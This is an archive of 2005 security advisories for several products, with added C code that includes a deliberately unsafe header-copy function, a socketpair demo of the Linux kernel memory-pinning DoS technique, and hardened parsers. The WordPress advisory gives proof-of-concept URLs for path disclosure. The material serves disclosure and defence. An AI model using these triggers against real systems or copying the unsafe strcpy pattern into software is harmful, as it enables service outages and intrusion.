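/* Vulnerable pattern: the header value lands in a fixed stack buffer with
 * no length check. Anything longer than HOST_BUF - 1 bytes overruns the
 * frame; on Windows the SEH record above the frame is what gets clobbered
 * first, which is the EIP control the advisory describes. Kept here for
 * contrast only; never feed it untrusted input. */
void copy_host_unsafe(const char *value)
{
    char host[HOST_BUF];
    strcpy(host, value);                 /* unbounded copy */
    printf("unsafe copy ok: %s\n", host);
}

/* Hardened form: locate the Host header in a raw HTTP request and copy its
 * value into out (capacity outsz). Returns 1 on success, 0 if the header is
 * absent, empty or would not fit. Oversized values are refused outright
 * rather than truncated, so a long header never reaches the copy. */
int parse_host_header(const char *req, size_t reqlen, char *out, size_t outsz)
{
    const char *p = req, *end = req + reqlen;
    while (p < end) {
        const char *eol = memchr(p, '\n', (size_t)(end - p));
        size_t linelen = eol ? (size_t)(eol - p) : (size_t)(end - p);
        if (linelen > 0 && p[linelen - 1] == '\r')
            linelen--;
        if (linelen == 0)                /* blank line ends the headers */
            break;
        if (linelen > 5 && strncasecmp(p, "Host:", 5) == 0) {
            const char *v = p + 5;
            size_t vlen = linelen - 5;
            while (vlen && (*v == ' ' || *v == '\t')) { v++; vlen--; }        /* trim OWS */
            while (vlen && (v[vlen - 1] == ' ' || v[vlen - 1] == '\t')) vlen--;
            if (vlen == 0 || vlen >= outsz)   /* the bound check strcpy() lacks */
                return 0;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return 1;
        }
        if (!eol)
            break;
        p = eol + 1;
    }
    return 0;
}

static char last_host[HOST_BUF];         /* receives the parsed value in the demos */

/* Constructed sample request with an ordinary Host value. */
int demo_normal_host(void)
{
    const char *req = "GET http://example.test/ HTTP/1.1\r\n"
                      "Host: example.test\r\n"
                      "User-Agent: demo\r\n\r\n";
    return parse_host_header(req, strlen(req), last_host, sizeof last_host);
}

const char *demo_last_host(void)
{
    return last_host;
}

/* Constructed sample request whose Host value is four times the buffer. */
int demo_oversized_host(void)
{
    static char req[HOST_BUF * 4 + 64];
    size_t n = 0;
    n += (size_t)snprintf(req + n, sizeof req - n, "GET / HTTP/1.1\r\nHost: ");
    memset(req + n, 'A', HOST_BUF * 4);  /* 1024 x 'A', far past the buffer */
    n += HOST_BUF * 4;
    n += (size_t)snprintf(req + n, sizeof req - n, "\r\n\r\n");
    return parse_host_header(req, n, last_host, sizeof last_host);
}

int main(void)
{
    printf("normal:    %d (%s)\n", demo_normal_host(), demo_last_host());
    printf("oversized: %d (rejected before any copy)\n", demo_oversized_host());
    copy_host_unsafe("example.test");    /* short input: harmless */
    return 0;
}
```

The hardened parser also works on the raw bytes of the request (length-delimited, not NUL-terminated), so embedded NULs in a header cannot shorten the copy the way they would with strcpy().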


iDefense Security Advisory 01.05.06: Blue Coat WinProxy Remote DoS Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]

Blue Coat WinProxy Remote DoS Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
January 05, 2006

I. BACKGROUND

Blue Coat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing, WinProxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s
WinProxy allows attackers to cause a denial of service (DoS) condition.

The vulnerability specifically exists due to improper handling of a long
HTTP request that is approximately 32,768 bytes long. When such a
request occurs, the process will crash while attempting to read past the
end of a memory region.

III. ANALYSIS

Successful exploitation requires an attacker to send a specially
constructed HTTP request to the WinProxy server on TCP port 80. This
will lead to a crash of the server and it will be unusable until it is
restarted.

This vulnerability may only be utilized by attackers who have access to
the network segment that contains the listening daemon, which in some
cases is a private local area network.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. Blue Coat has
reported that previous versions are not affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3187 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

FistFuXXer is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


iDefense Security Advisory 12.22.05: Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability

2005-12-22 Thread [EMAIL PROTECTED]

Linux Kernel Socket Buffer Memory Exhaustion DoS Vulnerability

iDefense Security Advisory 12.22.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=362
December 22, 2005

I. BACKGROUND

Linux is a clone of the operating system Unix, written from scratch by
Linus Torvalds with assistance from a loosely-knit team of hackers
across the Net. It aims towards POSIX and Single UNIX Specification
compliance.

More information is available from the vendor website:

 http://www.kernel.org

II. DESCRIPTION

Local exploitation of a memory exhaustion vulnerability in Linux Kernel
versions 2.4 and 2.6 can allow attackers to cause a denial of service
condition.

The vulnerability specifically exists due to a lack of resource checking
during the buffering of data for transfer over a pair of sockets. An
attacker can create a situation that, depending on the amount of
available system resources, can cause the kernel to panic due to memory
resource exhaustion. The attack is conducted by opening up a number of
connected file descriptors or socketpairs and creating the largest
possible kernel buffer for the data transfer between the two sockets. By
causing the process to enter a zombie state or closing the file
descriptor while keeping a reference open, the data is kept in the
kernel until the transfer can complete. If done repeatedly, system
memory resources can be exhausted from the kernel.

III. ANALYSIS

Successful exploitation requires an attacker to have local access to an
affected Linux system and can result in complete system denial of
service. The system may not reboot after successful exploitation,
requiring human interaction to be restored to a working state. Depending
on available resources, systems with large amounts of physical memory
may not be affected.

IV. DETECTION

iDefense has confirmed that Linux 2.4.22 and Linux 2.6.12 are
vulnerable.

V. WORKAROUND

An effective workaround is not available for this vulnerability.

VI. VENDOR RESPONSE

The maintainer acknowledges that this issue is a design limitation in
the Linux kernel. The following advice has been offered for creating a
patch. It should be noted that this patch has not been fully tested.

The patch requires three steps:

1) Add a "struct user *" reference to the "struct file" file structure.

2) Whenever creating a new "struct file" add the following code:

   struct user *user = current->user;

   /* refuse the new file once this user is at the per-user cap */
   if (atomic_read(&user->files) > MAX_FILES_FOR_THIS_USER)
       return -EMFILE;

   /* charge the file to its owner and hold a reference on the user */
   file->user = user;
   if (user) {
       atomic_inc(&user->count);
       atomic_inc(&user->files);
   }

3) Whenever a "struct file" is released apply the following code:

   struct user *user = file->user;

   /* uncharge the file and drop the reference taken at creation */
   if (user) {
       atomic_dec(&user->files);
       free_uid(user);
   }

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3660 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/17/2005 Initial vendor notification - Linux vendors
11/19/2005 Initial vendor responses
12/22/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
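The buffering behaviour the advisory relies on, reduced to a single socketpair as an added example (this is neither the discoverer's tool nor the kernel patch above): fill the kernel-side buffer of one pair as far as it goes, close the writing end, and show that the bytes (and so the kernel memory) stay pinned as long as any reference to the other end is open. The 4096-byte chunk size and the per-process worst-case formula are assumptions for the demonstration; whether a given total actually panics a machine depends on its memory, as the advisory says.

```c
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <unistd.h>

/* One round of the technique, scaled down to a single pair: fill the
 * kernel buffer of an AF_UNIX socketpair until it refuses more, then close
 * the writer while the reader keeps the data alive. Returns the number of
 * bytes the kernel was still holding after the writer was gone, or -1. */
long pinned_bytes_one_pair(void)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;

    /* Non-blocking so the fill loop stops at EAGAIN instead of hanging. */
    if (fcntl(sv[0], F_SETFL, O_NONBLOCK) == -1) {
        close(sv[0]);
        close(sv[1]);
        return -1;
    }

    static char chunk[4096];
    memset(chunk, 'A', sizeof chunk);

    long written = 0;
    for (;;) {
        ssize_t n = write(sv[0], chunk, sizeof chunk);
        if (n > 0) {
            written += n;
            continue;
        }
        if (n < 0 && (errno == EAGAIN || errno == EWOULDBLOCK))
            break;                       /* buffer is as full as it gets */
        close(sv[0]);
        close(sv[1]);
        return -1;
    }

    /* Drop the writer. Nothing is freed: the queued bytes belong to the
     * reader until it consumes them or is closed. */
    close(sv[0]);

    /* Drain the reader to show the data (hence the memory) survived. */
    long drained = 0;
    char sink[4096];
    for (;;) {
        ssize_t n = read(sv[1], sink, sizeof sink);
        if (n <= 0)
            break;                       /* 0 = EOF now that the writer is closed */
        drained += n;
    }
    close(sv[1]);

    return drained == written ? drained : -1;
}

/* Upper bound on what one process could pin this way: every pair costs two
 * descriptors, so RLIMIT_NOFILE / 2 pairs, each holding per_pair bytes.
 * An attacker multiplies this across processes; the advisory's point is
 * that nothing charges the total to the user at all. */
long worst_case_bytes_per_process(long per_pair)
{
    struct rlimit rl;
    if (per_pair <= 0 || getrlimit(RLIMIT_NOFILE, &rl) != 0)
        return -1;
    if (rl.rlim_cur == RLIM_INFINITY)
        return LONG_MAX;
    long pairs = (long)(rl.rlim_cur / 2);
    if (pairs > LONG_MAX / per_pair)     /* avoid overflowing the product */
        return LONG_MAX;
    return pairs * per_pair;
}

int main(void)
{
    long per_pair = pinned_bytes_one_pair();
    printf("bytes pinned by one socketpair after close(writer): %ld\n", per_pair);
    printf("worst case for this process under RLIMIT_NOFILE:   %ld\n",
           worst_case_bytes_per_process(per_pair));
    return 0;
}
```

The number printed for one pair is the kernel's default socket send-buffer size on the machine; multiplying it by the descriptor limit, and then by however many processes the user may run, gives the exposure the per-user file accounting in the vendor's patch sketch is meant to bound.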



iDefense Security Advisory 12.21.05: Macromedia JRun 4 Web Server URL Parsing Buffer Overflow Vulnerability

2005-12-21 Thread [EMAIL PROTECTED]

Macromedia JRun 4 Web Server URL Parsing Buffer Overflow Vulnerability

iDefense Security Advisory 12.21.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=360
December 21, 2005

I. BACKGROUND

Macromedia JRun 4 is an application server used for developing and
deploying Java based applications. More information can be found at
the following URL:

 http://www.macromedia.com/software/jrun/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Adobe Inc.'s
JRun 4 may allow attackers to execute arbitrary code or cause a denial
of service condition.

The vulnerability exists within the JRun web server, specifically in the
handling of long request strings. In certain configurations, when a long
(approximately 64k) URL is supplied, a stack-based overflow occurs
potentially allowing the execution of arbitrary code. In testing
performed by iDefense Labs, it was possible to overwrite the saved
return address on the stack with remotely supplied values (converted
into 'wide characters' by the server).

III. ANALYSIS

Successful exploitation may allow remote attackers to execute arbitrary
code with Local System privileges. The supplied JRun web server must be
active for the attack vector to exist. It is not recommended to use the
JRun web server component in production systems, as the installer
mentions that it should be used for development only.

As the service restarts after each crash, it is possible to make
multiple attempts to exploit this issue, and each time restart from a
'clean' state.

Although this vulnerability allows a stack overwrite, it may be more
difficult to exploit due to the input string being converted into a 'wide
character' version of the input, by placing a null byte between
each character. While this does not necessarily prevent exploitation, it
does increase the complexity of developing an exploit.

Exploitation of this vulnerability may allow a remote attacker to
execute code on the affected system as Local System, allowing complete
compromise, or cause a denial of service against the affected system,
preventing legitimate use.

IV. DETECTION

This vulnerability was confirmed by the vendor to affect the JRun 4
web server prior to the JRun 4 Updater 5 release in March of 2005.

V. WORKAROUND

The JRun documentation suggests that the JRun Web Server should not be
used in a production environment. In a development environment, the
JRun server should not accept connections from outside of the
development network.

VI. VENDOR RESPONSE

Adobe has reported that this issue was resolved in the JRun 4 Updater 5
release in March 2005.

The following security advisory was released on December 15, 2005:

http://www.macromedia.com/devnet/security/security_zone/mpsb05-13.html

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

08/25/2004 Initial vendor notification
08/31/2004 Initial vendor response
12/21/2005 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2

2005-12-21 Thread [EMAIL PROTECTED]
ECHO.OR.ID
ECHO_ADV_24$2005

---
[ECHO_ADV_24$2005] Full path disclosure on WordPress < 1.5.2
---

Author: Dedi Dwianto
Date: Dec, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv24-theday-2005.txt

---

Affected software description:
~~

Application : JAF CMS
version: < 1.5.2
URL  : http://wordpress.org/
Description :

WordPress is a very popular personal publishing platform, aka blog
software, and is used by everyone from celebrities, to government
officials, to non-technical average Joes.
---

Vulnerabilities:


A. Full path disclosure:

   A remote user can access the file directly to cause the system to display  
   an error message that indicates the installation path. The resulting error 
   message will disclose potentially sensitive installation path information 
   to the remote attacker.

  * http://victim/[WP Folder]/wp-includes/vars.php?PHP_SELF%20=dudul

  POC :
  
  http://localhost/blog/wp-includes/vars.php?PHP_SELF%20=dudul
  
  Fatal error: Call to undefined function: get_settings() in 
  /var/www/html/blog/wp-includes/vars.php on line 106

  
  * http://victim/[WP Folder]/wp-content/plugins/hello.php

  POC :

  http://localhost/blog/wp-content/plugins/hello.php

  Fatal error: Call to undefined function: wptexturize() in 
  /var/www/html/blog/wp-content/plugins/hello.php on line 44


  * http://victim/[WP Folder]/wp-admin/menu-header.php?self=dudul

  POC :
 
  http://localhost/blog/wp-admin/menu-header.php?self=dudul

  PHP Fatal error: Call to undefined function: get_admin_page_parent() in
  /var/www/html/blog/wp-admin/menu-header.php on line 6 
  Fatal error: Call to undefined function: get_admin_page_parent() in 
  /var/www/html/blog/wp-admin/menu-header.php on line 6


  * http://victim/[WP Folder]/wp-admin/upgrade-functions.php

  POC :

  http://localhost/[WP Folder]/wp-admin/upgrade-functions.php
  
  Warning: main(ABSPATH/wp-admin/admin-functions.php): failed to open stream:
  No such file or directory in /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
  PHP Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php'
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in
  /var/www/html/blog/wp-admin/upgrade-functions.php on line 3
  Fatal error: main(): Failed opening required 'ABSPATH/wp-admin/admin-functions.php'
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in
  /var/www/html/blog/wp-admin/upgrade-functions.php on line 3


  * http://victim/[WP FOlder]/wp-admin/edit-form.php

  POC :
   
  http://localhost/blog/wp-admin/edit-form.php

  PHP Fatal error: Call to undefined function: _e() in 
/var/www/html/blog/wp-admin/edit-form.php on line 3 
  Fatal error: Call to undefined function: _e() in 
/var/www/html/blog/wp-admin/edit-form.php on line 3

  * http://victim/[WP FOlder]/wp-settings.php

  
  POC : http://localhost/blog/wp-settings.php

  Warning: main(ABSPATHwp-includes/wp-db.php): failed to open stream: No such
  file or directory in /var/www/html/blog/wp-settings.php on line 59
  PHP Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in
  /var/www/html/blog/wp-settings.php on line 59
  Fatal error: main(): Failed opening required 'ABSPATHwp-includes/wp-db.php'
  (include_path='.:/usr/share/pear:/usr/local/lib/php') in
  /var/www/html/blog/wp-settings.php on line 59


  * http://victim/[WP FOlder]/wp-admin/edit-form-comment.php

  POC :
  
  http://localhost/blog/wp-admin/edit-form-comment.php

  Fatal error: Call to undefined function: __() in 
/var/www/html/blog/wp-admin/edit-form-comment.php on line 2


B. Fix

  For users who do not know how to fix the script, change the php.ini
  settings: turn on log_errors and turn off display_errors.

---

Shoutz:
~~~

~ y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ [EMAIL PROTECTED] 
~ [EMAIL PROTECTED]

---
Contact:


 the_day || echo|staff || the_day[at]echo[dot]or[dot]id
 Homepage: http://theday.echo.or.id/

 [ EOF ] --


iDefense Security Advisory 12.20.05: McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwrite

2005-12-20 Thread [EMAIL PROTECTED]

McAfee Security Center MCINSCTL.DLL ActiveX Control File Overwrite

iDefense Security Advisory 12.20.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=358
December 20, 2005

I. BACKGROUND

McAfee VirusScan is an anti-virus software. More information is
available from the vendor website:

http://www.mcafee.com/myapps/

II. DESCRIPTION

Remote exploitation of an access control vulnerability in McAfee
Security Center allows attackers to create or overwrite arbitrary
files.

The vulnerability specifically exists due to a registered ActiveX
control failing to restrict which domains may load the control for
execution. MCINSCTL.DLL as included with McAfee Security Center exports
an object for logging called MCINSTALL.McLog. The McLog object is
designed to allow Security Center to log to a file through the StartLog
and AddLog methods. McAfee fails to restrict the ActiveX control from
being loaded in arbitrary domains. As such, attackers can create a
specially crafted web page utilizing the McLog object to create
arbitrary files. This attack can lead to arbitrary code execution by a
remote attacker.

III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to
create or append to arbitrary files. An attacker can write to a startup
folder to execute arbitrary code during the next reboot or logon
session. A user will not be required to authorize the object
instantiation since the object is within a signed ActiveX control. A
typical exploitation scenario would require an attacker to convince a
targeted user to visit a malicious website.

This vulnerability hints at a new class of vulnerabilities that occur
due to developers not using the IObjectSafetySiteLock() API to restrict
domains that can load a particular ActiveX control. Vendors who
distribute third-party ActiveX controls should be sure to use the
IObjectSafetySiteLock() API in their applications.

IV. DETECTION

McAfee Security Center is a component that is distributed with various
McAfee products. The following products have been confirmed to contain
a vulnerable mcinsctl.dll component in their distribution:

• McAfee VirusScan (mcinsctl.dll 4.0.0.83)

V. WORKAROUND

iDefense is unaware of any effective workarounds at this time.

VI. VENDOR RESPONSE

"McAfee previously released updates to SecurityCenter that resolve this
issue. All active McAfee SecurityCenter users, by default, should have
automatically received the update, and will now have the fix for this
vulnerability already installed on their computers.

To manually check for updates, users can right-click the McAfee system
tray icon (white M on red background) and select 'Updates'. In the
resulting dialogue box, they should click 'Check Now' to check the
server for updates. The user will be walked through the update process
or be notified that all software is up to date. If a user has not yet
registered, a registration web page or the registration wizard will
pop-up, guiding the user through the update process.

McAfee's key priority is the security of our customers. In the event
that a vulnerability is found within any of McAfee's software, we have a
strong process in place to work closely with the relevant security
research group to ensure the rapid and effective development of a fix
and communication plan."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3657 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005 Initial vendor notification
11/16/2005 Initial vendor response
12/20/2005 Coordinated public disclosure

IX. CREDIT

iDefense credits Peter Vreugdenhil with the discovery of this
vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



iDefense Security Advisory 12.20.05: Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability

2005-12-20 Thread [EMAIL PROTECTED]
Qualcomm WorldMail IMAP Server String Literal Processing Overflow 
Vulnerability


iDefense Security Advisory 12.20.05
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359
December 20, 2005

I. BACKGROUND

Qualcomm WorldMail is an email and messaging server designed for use
in small to large enterprises that supports IMAP, POP3, SMTP, and web
mail features.

More information can be found on the vendors site:

 http://www.eudora.com/worldmail/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Qualcomm
WorldMail IMAP Server allows unauthenticated attackers to execute
arbitrary code.

III. ANALYSIS

Successful exploitation of this vulnerability allows attackers to
execute arbitrary code with SYSTEM privileges. This leads to a total
compromise of the mail server.

In order to trigger this overflow, an attacker only needs to send a long
string ending with a '}' character. This will result in a stack overflow
and the attacker may use an SEH overwrite or a standard EBP or EIP
overwrite in order to gain control of the process trivially.

This is a pre-authentication vulnerability. To exploit this
vulnerability an attacker would need to be able to connect to the e-mail
server and the IMAP module would have to be enabled (default). Only one
command is required to trigger this vulnerability.

IV. DETECTION

This exploit was tested against Qualcomm Worldmail server version 3.0.
Other versions may be vulnerable.

V. WORKAROUND

There is no workaround currently available except for disabling IMAP
services.

VI. VENDOR RESPONSE

The vendor was contacted according to the timeline shown but a response
has not yet been received. As this vulnerability has been publicly
disclosed at an alternate location
(http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html) we are
proceeding with public disclosure.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4267 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/15/2005  Initial vendor notification
12/20/2005  Coordinated public disclosure

IX. CREDIT

[EMAIL PROTECTED], an anonymous researcher and Nico are credited with
the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
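The trigger described above is a long string ending in '}', the closing character of an IMAP literal announcement ("{n}"). As an added example, not WorldMail's code and not the published exploit, here is a literal-size parser that validates the syntax and bounds the announced size before anything is copied, so the advisory's input is rejected at the digit check. MAX_LINE, MAX_LITERAL and the sample command lines are assumptions for the demonstration.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_LINE     8192     /* hypothetical cap on one command line */
#define MAX_LITERAL  65536    /* hypothetical cap on an announced literal */

/* Parse the literal announcement "{n}" that ends an IMAP command line
 * (RFC 3501: SP "{" number "}" CRLF). Returns n, or -1 when the line is
 * malformed, when n is not a short run of digits, or when n exceeds
 * MAX_LITERAL. A long run of bytes ending in '}' fails the digit check
 * long before any copy could happen. */
long imap_literal_size(const char *line, size_t len)
{
    if (len == 0 || len > MAX_LINE)
        return -1;

    size_t end = len;                                  /* strip CRLF or LF */
    if (end >= 2 && line[end - 2] == '\r' && line[end - 1] == '\n')
        end -= 2;
    else if (end >= 1 && line[end - 1] == '\n')
        end -= 1;
    if (end == 0 || line[end - 1] != '}')
        return -1;

    size_t close = end - 1;                            /* index of '}' */
    size_t first = close;                              /* walk back over digits */
    while (first > 0 && isdigit((unsigned char)line[first - 1]))
        first--;

    /* Need "{", at least one digit, a sane digit count, and SP before "{". */
    if (first < 2 || line[first - 1] != '{' || line[first - 2] != ' ')
        return -1;
    if (close == first || close - first > 10)
        return -1;

    long n = 0;
    for (size_t i = first; i < close; i++) {
        n = n * 10 + (line[i] - '0');
        if (n > MAX_LITERAL)                           /* bail before any overflow */
            return -1;
    }
    return n;
}

/* Convenience wrapper for NUL-terminated lines. */
long literal_of(const char *line)
{
    return imap_literal_size(line, strlen(line));
}

/* Constructed stand-in for the advisory's trigger: 4000 bytes of 'A'
 * followed by '}' and CRLF. */
long demo_long_brace_line(void)
{
    static char line[4096];
    memset(line, 'A', 4000);
    line[4000] = '}';
    line[4001] = '\r';
    line[4002] = '\n';
    return imap_literal_size(line, 4003);
}

int main(void)
{
    printf("LOGIN {5}        -> %ld\n", literal_of("A001 LOGIN {5}\r\n"));
    printf("APPEND {65537}   -> %ld\n", literal_of("A002 APPEND INBOX {65537}\r\n"));
    printf("4000 x 'A' + '}' -> %ld\n", demo_long_brace_line());
    return 0;
}
```

A server that accepts the announced size must still read exactly that many bytes afterwards and never more; the check here only closes the parsing side of the problem.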


iDefense Security Advisory 12.16.05: Citrix Program Neighborhood Name Heap Corruption Vulnerability

2005-12-16 Thread [EMAIL PROTECTED]

Citrix Program Neighborhood Name Heap Corruption Vulnerability

iDefense Security Advisory 12.16.05
www.idefense.com/application/poi/display?id=357&type=vulnerabilities
December 16, 2005

I. BACKGROUND

Citrix Program Neighborhood is the client used to connect to
applications published on Citrix Metaframe servers.

More information is available from the vendor website:

  http://www.citrix.com

II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Citrix, Inc.'s
Program Neighborhood allows attackers to execute arbitrary code.

The vulnerability specifically exists due to insufficient handling of
corrupt Application Set responses. A heap-based buffer overflow will
occur when the Citrix Program Neighborhood client receives an
Application Set response containing a name value over 286 bytes. The
overflow will trigger an access violation in RtlFreeHeap() with
register control sufficient to write 4 bytes to an arbitrary location
as shown below:

77F52A7B  8B4E 0C MOV ECX,DWORD PTR DS:[ESI+C]
77F52A7E  898D 60FF  MOV DWORD PTR SS:[EBP-A0],ECX
77F52A84  8901   MOV DWORD PTR DS:[ECX],EAX

Registers:
EAX 41414141
ECX 4141
ESI 008D5E30 ASCII "AA"
EIP 77F52A84 ntdll.77F52A84

Crash:
77F52A84  8901   MOV DWORD PTR DS:[ECX],EAX

Remote attackers can send a specially crafted name value to overflow
the buffer and execute arbitrary code.

III. ANALYSIS

Successful exploitation of the vulnerability allows remote attackers to
execute arbitrary code with user privileges. The overflow is a
trivial heap-based buffer overflow due to insufficient bounds checking
on the 'name' value in Application Set responses. A typical
exploitation scenario would require an attacker to set up a fake Citrix
Server and wait for a Citrix Program Neighborhood client to connect.
Upon receiving the first connecting packets from the client, the server
would send a corrupt UDP packet to the client.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Citrix
Presentation Server Client 9.0. All prior versions are suspected
vulnerable.

V. WORKAROUND

iDefense is unaware of any effective workarounds at this time.

VI. VENDOR RESPONSE

The vendor has released the following advisory to address this issue:

http://support.citrix.com/kb/entry.jspa?externalID=CTX108354

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3652 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005 Initial vendor notification
11/15/2005 Initial vendor response
12/16/2005 Coordinated public disclosure

IX. CREDIT

iDefense credits Patrik Karlsson ([EMAIL PROTECTED]) with the discovery
of this vulnerability.

Get paid for vulnerability research
http://www.iDefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.iDefense.com

X. LEGAL NOTICES

Copyright © 2005 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


iDefense Security Advisory 12.14.05: Trend Micro PC-Cillin Internet Security Insecure File Permission Vulnerability

2005-12-15 Thread [EMAIL PROTECTED]


Trend Micro PC-Cillin Internet Security Insecure File Permission 
Vulnerability


iDefense Security Advisory 12.14.05
www.idefense.com/application/poi/display?id=351&type=vulnerabilities
